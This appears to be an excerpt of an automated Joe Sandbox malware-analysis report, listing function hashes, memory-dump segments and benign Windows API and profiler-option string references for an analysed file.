API String ID:
Opcode ID: 1b01198ff804a674b8030116264b41e045a8f6e4aaea95b85fd782acf69c3816
Instruction ID: 292d3b46ad7b19edc5bff1b5b5dea77438d185b08b7ac495353b4801388c21d6
Opcode Fuzzy Hash: 1b01198ff804a674b8030116264b41e045a8f6e4aaea95b85fd782acf69c3816
Instruction Fuzzy Hash: 06F12671B087459FD700CE28C8907AAB7E2AFC5318F158A2DE9D487781F776D889C792

Function 00C4742E Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9626abcb791950e92a8cb390fd8eb61a0b73feb81e4705180c769186ef48216f
Instruction ID: 3d766631094515e1c4e18cf197baac3a5ce4dbdc95ef4e57850437cef72acd09
Opcode Fuzzy Hash: 9626abcb791950e92a8cb390fd8eb61a0b73feb81e4705180c769186ef48216f
Instruction Fuzzy Hash: 34B14AF3A082049FE7149E2CEC857BBB7E5EF98310F19463DDAC5C3744E63698458646

Function 00A8BEC1 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7963524cc738c1867271717a2d913c8e928a022f6dedc9ef01336f99614effc6
Instruction ID: bb42f11d1acafad1b032ccbf72e651c8a8eccb9875bd52d2d2b4d4ef3d9a6c9d
Opcode Fuzzy Hash: 7963524cc738c1867271717a2d913c8e928a022f6dedc9ef01336f99614effc6
Instruction Fuzzy Hash: 9671F6F7E082105BF308AA79EC8577BBBD9DB94360F1B463DEA89D3381E9395C044295

Function 00AB6909 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 971f2520df97265e864a6693ffbded75dd3b2da3f6b00b4e5a1407e46f2ebb8e
Instruction ID: a11a38c70a3857a4542d796e90cef05d26252245d862ef92ed37b1822d321d15
Opcode Fuzzy Hash: 971f2520df97265e864a6693ffbded75dd3b2da3f6b00b4e5a1407e46f2ebb8e
Instruction Fuzzy Hash: 52712AF3E082104BE314AE7DDC8576AB7E5EF94720F0A893DEAC8D3784E5795D018682

Function 00A2727D Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48dfd03d940f6ca6f39f8b79041706b8c5a0b0c460af940c54c1af6bb99cc7f4
Instruction ID: bbec29b6163e32cbd328275e4d793172e70ba6e353dcb329fee7277cf6c3562a
Opcode Fuzzy Hash: 48dfd03d940f6ca6f39f8b79041706b8c5a0b0c460af940c54c1af6bb99cc7f4
Instruction Fuzzy Hash: B341DFB3E582205BF318AA78CC5576AB6D59F54320F1B863C8F99A37C4E839580442CA

Function 00ACF0EF Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a23aaffc36c8fc90a2136fb4d171b60b49c100c3c133654f8276aaf08682422
Instruction ID: 825fa5261b678c14abf970d51fc097fe1a06230f2043d13e84dcf4689bbf1b16
Opcode Fuzzy Hash: 4a23aaffc36c8fc90a2136fb4d171b60b49c100c3c133654f8276aaf08682422
Instruction Fuzzy Hash: 0D2126F26082109BE318BAA9DC957BBF7D9EF54760F1A462EDAC5C2340E66518028792

Function 00779750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6CBF55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CBCE1A5), ref: 6CBF5606
LoadLibraryW.KERNEL32(gdi32,?,6CBCE1A5), ref: 6CBF560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CBF5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CBF563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CBF566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CBF567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CBF5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CBF56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CBF56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CBF56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CBF56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CBF5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CBF572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CBF5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CBF5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CBF577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CBF5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CBF57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CBF57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CBF57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CBF57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CBF57FF

Strings

GetThreadDpiAwarenessContext, xrefs: 6CBF562D
AreDpiAwarenessContextsEqual, xrefs: 6CBF5637
MonitorFromWindow, xrefs: 6CBF578D
GetWindowDC, xrefs: 6CBF5710
GetDpiForWindow, xrefs: 6CBF5690
StretchDIBits, xrefs: 6CBF57CC
ReleaseDC, xrefs: 6CBF5742
RegisterClassW, xrefs: 6CBF56AC
FillRect, xrefs: 6CBF5729
CreateSolidBrush, xrefs: 6CBF57E4
user32, xrefs: 6CBF5601
GetMonitorInfoW, xrefs: 6CBF57A2
LoadIconW, xrefs: 6CBF575B
ShowWindow, xrefs: 6CBF56DE
EnableNonClientDpiScaling, xrefs: 6CBF5666
CreateWindowExW, xrefs: 6CBF56C5
gdi32, xrefs: 6CBF560A
SetWindowLongPtrW, xrefs: 6CBF57B7
GetSystemMetricsForDpi, xrefs: 6CBF5677
LoadCursorW, xrefs: 6CBF5774
DeleteObject, xrefs: 6CBF57F9
SetWindowPos, xrefs: 6CBF56F7

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: e64daa49fc608582f6289db54f8b7d149b81247870e5adcb4f990df1d33c85f3
Instruction ID: 59625575fbc0dd020131653666f6bb483564df1bdb8e9139e94b9b288802f32c
Opcode Fuzzy Hash: e64daa49fc608582f6289db54f8b7d149b81247870e5adcb4f990df1d33c85f3
Instruction Fuzzy Hash: 435153B07157476FEB019F378D1592A3AB9BF06745B108429A921E2F42EF74CC068F65

Function 6CBDCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CBA582D), ref: 6CBDCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CBA582D), ref: 6CBDCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC0FE98,?,?,?,?,?,6CBA582D), ref: 6CBDCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CBA582D), ref: 6CBDCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CBA582D), ref: 6CBDCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CBA582D), ref: 6CBDCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBA582D), ref: 6CBDCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CBDCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CBDCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CBDCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CBDCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CBDCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CBDCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CBDCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CBDCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CBDCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CBDCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CBDCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CBDCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CBDCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CBDCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CBDCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CBDCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CBDCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CBDCE8A

Strings

leaf, xrefs: 6CBDCC66
screenshots, xrefs: 6CBDCCD4
markersallthreads, xrefs: 6CBDCE42
samplingallthreads, xrefs: 6CBDCE2C
stackwalk, xrefs: 6CBDCCF8
default, xrefs: 6CBDCC21
fileio, xrefs: 6CBDCC92
preferencereads, xrefs: 6CBDCD92
unregisteredthreads, xrefs: 6CBDCE58
noiostacks, xrefs: 6CBDCCBE
power, xrefs: 6CBDCE84
nativeallocations, xrefs: 6CBDCDA8
audiocallbacktracing, xrefs: 6CBDCDD4
java, xrefs: 6CBDCC37
mainthreadio, xrefs: 6CBDCC7C
nostacksampling, xrefs: 6CBDCD7C
fileioall, xrefs: 6CBDCCA8
notimerresolutionchange, xrefs: 6CBDCE00
jsallocations, xrefs: 6CBDCD0E
ipcmessages, xrefs: 6CBDCDBE
seqstyle, xrefs: 6CBDCCE6
processcpu, xrefs: 6CBDCE6E
Unrecognized feature "%s"., xrefs: 6CBDCEA0
cpuallthreads, xrefs: 6CBDCE16

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
